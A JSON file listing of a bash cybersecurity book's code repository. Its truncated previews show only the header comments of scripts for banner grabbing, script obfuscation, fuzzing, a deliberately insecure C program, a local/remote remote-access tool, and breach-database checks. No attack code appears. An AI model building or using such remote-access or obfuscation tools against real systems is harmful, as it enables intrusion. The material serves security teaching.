"preview": "#include <stdio.h>\n\nint main()\n{\n printf(\"Hello World!\\n\");\n return 0;\n}\n"
},
{
"path": "ch11/vtjson.awk",
"chars": 720,
"preview": "# Cybersecurity Ops with bash\n# vtjson.awk\n#\n# Description: \n# Search a JSON file for VirusTotal malware hits\n#\n# Usage:"
},
{
"path": "ch11/vtjson.sh",
"chars": 791,
"preview": "#!/bin/bash -\n#\n# Rapid Cybersecurity Ops\n# vtjson.sh\n#\n# Description: \n# Search a JSON file for VirusTotal malware hits"
},
{
"path": "ch12/tagit.sh",
"chars": 251,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# tagit.sh\n#\n# Description: \n# Place open and close tags around a string\n#"
},
{
"path": "ch12/webdash.sh",
"chars": 2256,
"preview": "#!/bin/bash -\n#\n# Rapid Cybersecurity Ops\n# webdash.sh\n#\n# Description: \n# Create an information dashboard\n# Heading\n# -"
},
{
"path": "ch12/weblogfmt.sh",
"chars": 1003,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# weblogfmt.sh\n#\n# Description: \n# Read in Apache web log and output as HT"
},
{
"path": "ch13/bannergrabber.sh",
"chars": 1453,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# bannergrabber.sh\n#\n# Description:\n# Automatically pull the banners from "
},
{
"path": "ch13/smtpconnect.sh",
"chars": 264,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# smtpconnect.sh\n#\n# Description: \n# Connect to a SMTP server and print we"
},
{
"path": "ch14/askey.sh",
"chars": 550,
"preview": "\n# functions to convert decimal to ascii and vice-versa\n\n# aschar - print the ascii character representation\n# "
},
{
"path": "ch14/innerscript.sh",
"chars": 68,
"preview": "echo \"This is an encrypted script\"\necho \"running uname -a\"\nuname -a\n"
},
{
"path": "ch14/logfuscate.sh",
"chars": 363,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# logfuscate.sh\n#\n# Description: \n# Demonstration of logic obfuscation\n#\n\n"
},
{
"path": "ch14/oneline.sh",
"chars": 244,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# oneline.sh\n#\n# Description: \n# Demonstration of one-line script obfuscat"
},
{
"path": "ch14/readable.sh",
"chars": 235,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# readable.sh\n#\n# Description: \n# Simple script to be obfuscated\n#\n\nif [[ "
},
{
"path": "ch14/streamcipher.sh",
"chars": 1768,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# streamcipher.sh\n#\n# Description: \n# A lightweight implementation of a st"
},
{
"path": "ch14/synfuscate.sh",
"chars": 234,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# synfuscate.sh\n#\n# Description: \n# Demonstration of syntax script obfusca"
},
{
"path": "ch14/wrapper.sh",
"chars": 488,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# wrapper.sh\n#\n# Description: \n# Example of executing an encrypted \"wrappe"
},
{
"path": "ch15/fuzzer.sh",
"chars": 1315,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# fuzzer.sh\n#\n# Description: \n# Fuzz a specified argument of a program\n#\n#"
},
{
"path": "ch15/fuzzme.c",
"chars": 366,
"preview": "#include <stdio.h>\n#include <string.h>\n\n//Cybersecurity Ops with bash\n//Warning - This is an insecure program and is for"
},
{
"path": "ch16/LocalRat.sh",
"chars": 890,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# LocalRat.sh\n#\n# Description: \n# Remote access tool to be on a local syst"
},
{
"path": "ch16/RemoteRat.sh",
"chars": 1373,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# RemoteRat.sh\n#\n# Description: \n# Remote access tool to be run on the rem"
},
{
"path": "ch19/pingmonitor.sh",
"chars": 875,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# pingmonitor.sh\n#\n# Description: \n# Use ping to monitor host availability"
},
{
"path": "ch20/softinv.sh",
"chars": 927,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# softinv.sh\n#\n# Description: \n# list the software installed on a system\n#"
},
{
"path": "ch21/test.input",
"chars": 212,
"preview": "file ./TODO.txt\n!file ./validate.sh\n!file nogo.sh\nuser albing\n!user bob\ngroup mysql\n!group skip\nhash a7f36f4519661cf2a"
},
{
"path": "ch21/validateconfig.sh",
"chars": 2812,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# validateconfig.sh\n#\n# Description: \n# Validate a specified configuration"
},
{
"path": "ch22/checkemail.1liner",
"chars": 444,
"preview": "#!/bin/bash\n#\n# checkemail.sh - check an email address against\n# the Have I Been Pwned? database\n#\t\t in"
},
{
"path": "ch22/checkemail.sh",
"chars": 607,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# checkemail.sh\n#\n# Description: \n# check an email address against the\n# H"
},
{
"path": "ch22/checkemailAlt.sh",
"chars": 614,
"preview": "#!/bin/bash\n#\n# checkemail.sh - check an email address against\n# the Have I Been Pwned? database\n#\n\nif ("
},
{
"path": "ch22/checkpass.sh",
"chars": 878,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# checkpass.sh\n#\n# Description: \n# Check a password against the\n# Have I B"
},
{
"path": "ch22/emailbatch.sh",
"chars": 477,
"preview": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# emailbatch.sh\n#\n# Description: \n# Read in a file of email addresses and "
},
{
"path": "readme.txt",
"chars": 1470,
"preview": "Cybersecurity Ops with bash\nAttack, Defend, and Analyze from the Command Line\n------------------------------------------"
}
]